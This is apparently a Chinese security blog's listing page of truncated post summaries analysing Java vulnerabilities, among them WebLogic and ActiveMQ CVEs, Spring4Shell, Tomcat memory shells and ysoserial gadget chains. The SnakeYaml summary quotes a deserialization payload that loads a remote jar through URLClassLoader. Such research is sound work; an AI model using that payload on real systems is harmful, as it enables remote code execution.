weblogic CVE-2024-20931分析
摘要:weblogic 12.2.1.4.0安装 我的环境:ubuntu 22.04 + weblogic 12.2.1.4.0 + jdk8(注:weblogic不支持OpenJDK) jdk下载安装:https://www.oracle.com/cn/java/technologies/downloa
阅读全文
posted @
2024-02-21 19:07
功夫小熊猫
阅读(1547)
推荐(0)
ActiveMQ RCE CVE-2023-46604分析
摘要:一、漏洞触发点 org.apache.activemq.openwire.v12包下BaseDataStreamMarshaller类的createThrowable方法。 package org.apache.activemq.openwire.v12; BaseDataStreamMarshal
阅读全文
posted @
2024-01-09 22:22
功夫小熊猫
阅读(865)
推荐(0)
tomcat Filter内存马
摘要:idea调试的时候加入源代码 ```markdown org.apache.tomcat tomcat-catalina 8.5.81 provided ``` Servlet、Listener、Filter 由 `javax.servlet.ServletContext` 去加载,无论是使用 xm
阅读全文
posted @
2023-07-04 22:49
功夫小熊猫
阅读(222)
推荐(0)
SnakeYaml的不出网反序列化利用分析
摘要:SnakeYaml的常见出网利用方式: !!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://127.0.0.1:9000/yaml-payload.jar"] ]] ] 不
阅读全文
posted @
2023-02-25 23:37
功夫小熊猫
阅读(624)
推荐(2)
ysoserial CommonsCollections2 分析
摘要:在最后一步的实现上,cc2和cc3一样,最终都是通过TemplatesImpl恶意字节码文件动态加载方式实现反序列化。 已知的TemplatesImpl->newTransformer()是最终要执行的。 TemplatesImpl类动态加载方式的实现分析见ysoserial CommonsColl
阅读全文
posted @
2022-11-02 21:38
功夫小熊猫
阅读(300)
推荐(0)
ysoserial CommonsCollections3 分析
摘要:

cc3利用链如下: TrAXFilter(Templates templates) TemplatesImpl->newTransformer() TemplatesImpl->getTransletInstance() _class[_transletIndex].newInstance(); 一
阅读全文
posted @
2022-10-28 13:25
功夫小熊猫
阅读(245)
推荐(0)
ysoserial CommonsCollections6 分析
摘要:利用链如下: 其中LazyMap.get()->ChainedTransformer.transform()-InvokerTransformer.transform()与CC1链一致。 /* Gadget chain: java.io.ObjectInputStream.readObject()
阅读全文
posted @
2022-10-13 20:37
功夫小熊猫
阅读(342)
推荐(0)
ysoserial CommonsCollections1 分析
摘要:/* Gadget chain: ObjectInputStream.readObject() AnnotationInvocationHandler.readObject() Map(Proxy).entrySet() AnnotationInvocationHandler.invoke() La
阅读全文
posted @
2022-10-05 22:16
功夫小熊猫
阅读(160)
推荐(0)
ysoserial URLDNS利用链分析
摘要:在分析URLDNS之前,必须了解JAVA序列化和反序列化的基本概念。其中几个重要的概念: 需要让某个对象支持序列化机制,就必须让其类是可序列化,为了让某类可序列化的,该类就必须实现如下两个接口之一: Serializable:标记接口,没有方法 Externalizable:该接口有方法需要实现,一
阅读全文
posted @
2022-08-10 09:28
功夫小熊猫
阅读(75)
推荐(0)
Spring rce CVE-2022-22965
摘要:

原理大致是这样:spring框架在传参的时候会与对应实体类自动参数绑定,通过“.”还可以访问对应实体类的引用类型变量。使用getClass方法,通过反射机制最终获取tomcat的日志配置成员属性,通过set方法,修改目录、内容等属性成员,达到任意文件写入的目的。 环境: jdk9、springmvc
阅读全文
posted @
2022-04-07 14:07
功夫小熊猫
阅读(413)
推荐(0)